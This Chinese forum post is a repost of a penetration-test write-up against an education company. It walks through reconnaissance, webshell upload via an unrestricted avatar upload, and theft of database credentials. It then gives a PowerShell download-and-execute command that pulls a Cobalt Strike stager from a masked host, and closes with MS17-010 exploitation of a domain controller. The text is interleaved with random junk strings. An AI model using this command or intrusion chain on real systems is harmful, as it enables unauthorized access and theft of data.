找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2034|回复: 0

渗透实战 | 从外网直接打到内网全过程

[复制链接]
发表于 2024-3-1 19:41:32 | 显示全部楼层 |阅读模式

! g3 B! z/ @9 v& ]- P) E" [& q 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 - F4 Y3 ?2 h z

& O) P; p6 ^& U

# ?8 Q/ Z& z8 g& T/ U2 X% h7 C   " G: x- a8 P# o8 G4 z8 b9 ~3 q

- i, B* \. z, [- ~

& J% `$ {( J. U( l+ O 正文 5 A/ h1 }5 I# C" v

4 p5 t' m( d4 [" b

* L, |- C+ i6 X8 P1 x  / F$ q; q2 S( q* l4 k$ ~4 }

+ z/ G% k- l! `1 q. r" q! J# K

5 S) C2 P B8 t t' w/ k! y/ x" [( O 目标:www.xxxx.com(一家教育机构)
6 {( W2 J; j# b( s
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
) O/ @' A1 V$ L+ f1 b& T: e

# q& j' m2 i3 @* q. I- X9 m9 |

; F& v, x* J8 s8 o& \3 k8 V# x vshapes= + Q N9 Z- O; x

9 h! w7 ~4 Y, s5 h! o

+ \; b) J3 L: \ } 进行了简单的信息搜集
% o3 @( `( |1 f" K
, Y1 K }) \- x; L
, ] Z N6 w' q# w+ i6 S! u$ x

# `) E [: Z2 l% ~; s" D8 J. F9 U% r

/ Z6 t9 }2 J& B 子域名搜集. j! ~6 h1 R. M- W0 A3 e

8 |* H- u% H; P3 c- w- i1 E

1 Z, c4 ^* J4 u vshapes= ( Q: h' Y4 l9 q9 z

7 A+ t2 w$ ~( z

! `/ F3 \+ N8 W( O+ \ fofa找资产
# D, l. i- I# y5 q/ p
9 L% G% ]9 P$ w' X- u
5 @' H. S+ W) @7 f3 a7 G

" U4 Q9 w: O6 x& x/ {1 c

% B1 b4 [; J+ [ vshapes= 5 i7 a3 K! f# [" b& ^

. t! F6 B8 l8 i7 W( l! h) n

( {4 N* ^4 U- s2 Z1 I7 R( t4 h+ `' F 一共七个资产。去重之后只有两个。
7 ]- L: ?* D6 V$ q
- C! ^& K2 l9 B4 [$ d
. W2 d1 S6 z9 o9 e {' c* W

- A$ J. ~7 E% R. Q. j

& Y0 c& q& f4 E 目录探测 ! Y0 ~4 a2 Z% ~; A. t& T

9 e: M, p' A% @- x2 @, W

% X" u! H' H% e) a vshapes= 8 B: ~" H ]# ~

2 D' u i2 b) {9 p/ s* H; A

8 n) j4 }2 Y" E; c' R, }1 a1 S 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
: L0 Y+ [ x. w# R
4 W1 _) o. v9 A8 H
R9 n$ e9 c! j) M7 i; ? x

. Y1 X, S! h2 G5 r, r

) k3 d) r9 A( H2 j/ ^0 E0 } 我又尝试了通过修改返回包来绕过登录界面 ! ^9 I# P! s) B. G" q' ?9 A( [

' m C4 _# ?- B0 b, {; p7 @0 _: \0 |

* l, ]" }# ]: M vshapes=/ S* {; k) i# P' m) q

) ^8 C0 f; h! u, g- J+ V

0 _6 L C! x9 x9 f; g 还是不行,尝试注入无果2 T2 W( b! _5 @: j \

& D2 F0 K) O) w

# v5 A$ ~( {8 \6 }; h v vshapes= : [ ]7 x, V* b9 I# X

/ o7 q4 p S. A" {6 p ~

8 t- o' z( Q6 o; l& } 不过我目录探测出了一处Spring信息泄露
* A- w/ I3 s! r5 `
+ ^1 ~& c$ t8 y, n' B. t
6 I& Z" r- p5 f9 D8 Z

" i4 S6 C8 j+ S' k$ g

4 Z: f6 j& f+ r6 D; w: C4 n# d vshapes= ( b" H" \5 I7 K9 c+ Z) k

& f( ~" G! O* K: F7 ], J5 |

, E* b& D, E) L% l( m 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 / T& J; F" Q( A/ X

; A) u" b$ a1 o2 K

4 Z, N% c0 J/ T: e6 a2 N vshapes=! q ~9 Z0 e7 O) E4 {4 X; ?

& S, Y* S; N& F, [& i; E% L

& ~+ {% v5 d7 k% n* t1 E7 G 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 3 \# \% S, t5 l

# [/ Z0 n; ^6 ?! _0 v

5 N7 W8 |3 I3 Y8 c+ O vshapes=, Q* P5 M% J& l/ R

$ T3 Z6 B2 c% r* y

: x/ U' ^, ~& F1 ` 获取有些师傅到这一步就手机抓包电脑测了。 ]; N6 G% B- k4 P1 r5 f

w5 N) a* ?+ j! _; d

, Q9 A9 P& [* P4 ` I Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 9 _, @9 f/ F* ]" z

& a, v7 U- A7 d) D1 @1 v

# i& d2 `3 m* }4 f 其中在一个公众号发现了小程序,可以进行注册。# @; @$ D! s* ~/ l

; h5 G3 J }. N5 Z' E; u" c

J7 |$ R4 L+ u% M6 ^; R% o 看到了头像上传,尝试上传获取WebShell " V% |0 p1 ~1 k. k: o$ ?7 l

; S- e' X S- S: a

. h0 I" E3 X% R vshapes= + E+ c3 S$ X& T% C! }* O* Z

1 f! {1 J9 X" C2 i9 Q

$ ?0 ~, y7 m- L+ K G4 W) x' f0 Q 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问3 a7 R# [* q7 X1 u! F

+ |" i" y, e. V) y% |. S

7 s& [# Z6 m: P6 R/ k" } vshapes= & N/ e9 X: _, K6 R8 p# K! x& h+ t. L

: A2 b6 b; l/ e! X! O7 \/ ]0 I, ?

8 { r8 S% R% ^7 W0 t 然后上了大马+ D" w7 t# A9 ^2 p' i

3 O- W1 v) q+ h" `& M0 u

; V2 z$ v1 Z0 ^ vshapes= / Z0 z2 i+ }4 |/ J, w

5 @: Q) w/ I! t6 R

r- _' I) J6 d. _1 j vshapes= a4 _. R% @3 x& B

! Q, u/ _. F: I4 e4 d+ j2 ^

; D% k& S5 {2 o" @2 m l 通过翻找文件发现数据库账号密码, o+ S N( J G: W9 ^( a) X9 ^

; L% G7 ~. v7 q! W( ~) w- X C

1 X7 K( Z& n( e vshapes= ' v9 G5 j" d+ M6 j c* P

# p5 R: p3 w8 `2 M. X

- g7 H. J; W7 H0 z5 W --内网渗透 1 W2 C+ M+ n( F! e) G9 V2 e

4 {+ \) j6 C# z! m0 _. ~! ~3 F" ^

2 s7 ^* p* f. H, h* W 直接通过powershell执行 cs上线3 E6 m: X4 i- g6 s$ e

1 P9 W% A$ N9 C) Z! d

! {( X4 F+ @( ], O- K! g powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"; V: x4 ?. b8 C5 A

( @) l7 }% W5 l9 i

! v' L; I9 a7 j# L1 g vshapes=/ @9 h& V0 A9 o( \. i: [7 n

7 a2 C7 r! Y/ @, M

. { q" o. x; V 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 " r8 [, E) P! R6 `" G6 ^

7 a9 o3 y; E H7 J

9 B) I* u/ Z. d vshapes= . V) J v. S, Q' h

+ ?3 M: A; r0 O# M j$ z

" f6 j9 f. J9 ?- [) \' Q0 U) n 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
. X# K9 d7 v" K% X! K( M
7 l* {% z$ |$ E/ P6 j2 F0 ]) M: D
* h- K( R1 b# Z! C i5 r
* y9 @& e* p3 q8 r: n8 U

( |+ D$ Q2 K4 W0 ~3 Q

( w; c; j" W! o* L4 @" `0 S9 P vshapes=* ]: Y6 k9 g* n4 ^- m0 L

' M5 \& C O' L) H, t2 D9 [

' q+ e' {! i: M4 `7 i/ ` 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
1 [- w/ W) C" }! u. l# ^
3 ^0 I, l* S* P' Q, B" Y& u
: P) X: U& {- Z9 Q

2 ]/ U$ R# W$ N8 @6 |

. L' g% |# o1 i' n7 x vshapes= & ~4 x( l, d3 x, X; M/ K7 O% u

/ O4 H7 l2 A+ M, e

6 I, k! [+ s8 I5 Y; g4 Z* W
& n( P6 ~/ U d. P1 U2 [, u+ Z( N
& z" b; p) R4 S" K. H! G+ e
5 V* Q6 O( U+ K' E1 i

: ^5 y5 P: W: M

0 [8 Y4 C% `6 O* t5 X   3 g, C* J. A! ] Y2 x+ E. l* g$ @

2 F( x" ?5 z# J- A! V

/ B2 x5 D( A& N7 `. P 小结) U* f0 s3 t+ B: g/ E

1 Y: ^* @+ ?& v+ @

( K: _0 ~) v$ V3 z+ T9 n. x  0 z+ a. _ i6 H

, B! {% Y2 w) ~; U( E# q. c

7 u8 A G8 L/ D2 x% k6 |! b9 w 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! 0 \& a/ e) A. p5 k* f6 n9 t

: d( v1 G! [/ a9 \! s

. X% v. K$ C* ]   1 H, K9 ]% _* ]5 |% {

$ H& X1 o2 x5 u: x. C" d( @1 F/ Y5 ?
    ! C4 `9 p! _+ @6 S9 @* E P
  • 4 j0 t7 d# _% j: c  ( w2 J- J8 _, b# y' m8 n; z) N
  • # Y6 S5 p( Z' c: d$ E
  • ' o" u; m/ p$ j! C( g  / u, x+ O$ }6 D
  • 0 d) }; H- M' N3 v9 [1 o
! N) I- @5 P/ N0 E# L6 _) e* e2 T# i

) Y0 ^6 X/ z- B; h 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html . a" I/ u Y# a6 A4 E, ?( N

3 N+ G: R5 N6 d, P; \/ k

! t% l- K, n5 w. i" w% }  # f8 \, i, w- Z( R

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表